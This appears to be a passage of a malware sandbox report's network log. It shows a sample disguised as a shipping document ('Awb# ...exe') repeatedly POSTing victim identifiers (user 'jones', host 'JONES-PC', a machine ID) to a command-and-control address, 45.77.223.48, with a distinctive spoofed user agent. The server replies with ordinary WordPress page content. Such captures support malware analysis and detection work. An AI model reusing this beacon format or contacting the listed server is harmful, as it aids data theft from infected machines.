                                              Apr 25, 2024 09:42:05.730705023 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.44975545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:05.989810944 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:06.115744114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:06.904895067 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:06 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:06.904932022 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:06.905114889 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:06.913031101 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:06.913316011 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:06.913429022 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:06.913722038 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:06.913826942 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:06.913855076 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:06.914036989 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.44975645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:07.189244032 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:07.319912910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:08.240958929 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:07 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:08.241008043 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:42:08.241019964 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:08.241030931 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:08.241174936 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:08.241184950 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:08.259830952 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:08.260708094 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:08.261924982 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:08.261969090 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.44975745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:08.607821941 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:08.737339973 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:09.560532093 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:08 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:09.560549021 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:09.569822073 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:09.570661068 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:09.570754051 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:09.570915937 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:09.570976019 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:09.571028948 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:09.571090937 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
                                              Apr 25, 2024 09:42:09.571190119 CEST1289INData Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63
                                              Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.44975845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:09.977319002 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:10.108103991 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:10.924082994 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:10 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:10.924181938 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:10.924228907 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:10.932991028 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:10.933604956 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:10.933696985 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:10.933876038 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:10.933917046 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:10.934032917 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:10.934072971 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.44975945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:11.222524881 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:11.351766109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:12.151199102 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:11 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:12.151349068 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:12.151469946 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:12.160645962 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:12.160938025 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:12.161058903 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:12.161421061 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:12.161596060 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
